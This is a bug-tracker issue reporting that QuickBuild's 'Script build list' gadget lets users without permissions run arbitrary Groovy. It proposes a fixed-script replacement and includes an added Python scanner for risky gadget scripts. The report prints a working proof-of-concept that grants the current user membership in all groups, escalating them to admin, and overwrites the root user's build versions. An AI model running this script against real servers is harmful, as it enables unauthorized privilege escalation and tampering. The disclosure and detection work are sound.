[DEMO-20] Serious error related to the execute script.
| Status: | Open |
| Project: | Demo |
| Component/s: | None |
| Affects Version/s: | None |
| Fix Version/s: | None |
| Type: | Bug | Priority: | Critical |
| Reporter: | Nguyen Duc Long | Assigned To: | Demo Project |
| Resolution: | Unresolved | Votes: | 0 |
| Remaining Estimate: | Unknown | Time Spent: | Unknown |
| Original Estimate: | Unknown | ||
| Description |
|
The right to create and execute code is granted in many places. In particular, users do not need any permissions to use the "Script build list" gadget.
Example of a dangerous script used for Script build list:

```
groovy:
import com.pmease.quickbuild.Context;
import com.pmease.quickbuild.model.Build;
import com.pmease.quickbuild.SearchCriteria;
import org.hibernate.criterion.Restrictions;
import org.hibernate.criterion.Criterion;
import org.hibernate.criterion.Order;
import com.pmease.quickbuild.entitymanager.BuildManager;
import com.pmease.quickbuild.model.Group
import com.pmease.quickbuild.entitymanager.GroupManager
import com.pmease.quickbuild.model.User
import com.pmease.quickbuild.entitymanager.UserManager
import com.pmease.quickbuild.model.Membership;
import com.pmease.quickbuild.entitymanager.MembershipManager;

// --- Hack admin permission ---
Collection<Group> groups = GroupManager.instance.getAll()
MembershipManager.instance.assign(Context.getUser(), groups, false)
// --- End - Hack admin permission ---

// --- Hack builds of root user ---
User rootUser = UserManager.instance.get(1)
Criterion[] criterions = [Restrictions.eq("requester", rootUser)];
Order[] orders = [Order.desc("beginDate")];
def criteria = new SearchCriteria(criterions, orders);
def builds = system.buildManager.search(criteria, 0, 10);
for(Build build in builds){
    build.setVersion("Hacked")
    BuildManager.instance.save(build);
}
// --- End - Hack builds of root user ---

return new ArrayList<Build>();
```

For the "Script build list" gadget, I suggest changing it to a "My build" gadget. It contains a fixed script instead of allowing one to be filled in.

Example:

```
groovy:
import com.pmease.quickbuild.Context;
import com.pmease.quickbuild.model.Build;
import com.pmease.quickbuild.SearchCriteria;
import org.hibernate.criterion.Restrictions;
import org.hibernate.criterion.Criterion;
import org.hibernate.criterion.Order;

if (Context.getUser() != null) {
    Criterion[] criterions = [Restrictions.eq("requester", Context.getUser())];
    Order[] orders = [Order.desc("beginDate")];
    def criteria = new SearchCriteria(criterions, orders);
    return system.buildManager.search(criteria, 0, #limit_setting(default=10));
} else {
    return new ArrayList<Build>();
}
```
|
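A defender-side triage check for the problem this report describes, as an added example that is not part of the original issue or of QuickBuild: it scans stored gadget scripts for entity-manager imports and state-changing calls that a read-only build list has no need for. The regex patterns, function names and gadget names are assumptions made for this example; the two sample inputs are excerpts of the scripts quoted in the description.

```python
import re

# Heuristic patterns chosen for this example (assumptions, not a QuickBuild API):
# entity-manager imports and state-changing calls a read-only list gadget never needs.
MANAGER_IMPORT = re.compile(
    r"^\s*import\s+com\.pmease\.quickbuild\.entitymanager\.(\w+)", re.M)
MUTATING_CALL = re.compile(r"\.(save|assign|delete|set[A-Z]\w*)\s*\(")
LINE_COMMENT = re.compile(r"//[^\n]*")

def audit_gadget_script(source):
    """Return sorted findings ("import:X" / "call:y") for one gadget script."""
    code = LINE_COMMENT.sub("", source)  # ignore commented-out code
    findings = {"import:" + m.group(1) for m in MANAGER_IMPORT.finditer(code)}
    findings |= {"call:" + m.group(1) for m in MUTATING_CALL.finditer(code)}
    return sorted(findings)

def audit_all(gadgets):
    """Map gadget name -> findings, keeping only gadgets that need review."""
    report = {name: audit_gadget_script(src) for name, src in gadgets.items()}
    return {name: found for name, found in report.items() if found}

# Excerpt of the dangerous script quoted in the issue description.
DANGEROUS = """groovy:
import com.pmease.quickbuild.Context;
import com.pmease.quickbuild.entitymanager.BuildManager;
import com.pmease.quickbuild.entitymanager.GroupManager
import com.pmease.quickbuild.entitymanager.MembershipManager;
Collection<Group> groups = GroupManager.instance.getAll()
MembershipManager.instance.assign(Context.getUser(), groups, false)
build.setVersion("Hacked")
BuildManager.instance.save(build);
"""

# Excerpt of the fixed "My build" script proposed in the issue description.
FIXED = """groovy:
import com.pmease.quickbuild.Context;
import com.pmease.quickbuild.SearchCriteria;
import org.hibernate.criterion.Restrictions;
Criterion[] criterions = [Restrictions.eq("requester", Context.getUser())];
return system.buildManager.search(criteria, 0, #limit_setting(default=10));
"""

if __name__ == "__main__":
    gadgets = {"script-build-list": DANGEROUS, "my-build": FIXED}  # constructed names
    for name, found in audit_all(gadgets).items():
        print(name, found)
```

A pattern scan like this only triages scripts that are already stored; it is not a sandbox and can be evaded by reflection or aliasing, so it complements rather than replaces the fixed-script gadget the report proposes.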
| Comments |
| Comment by Nguyen Duc Long [ 29/Jan/26 11:08 AM ] |
| Sorry, this is a Quickbuild project issue. I placed it in the wrong location. Please close it. |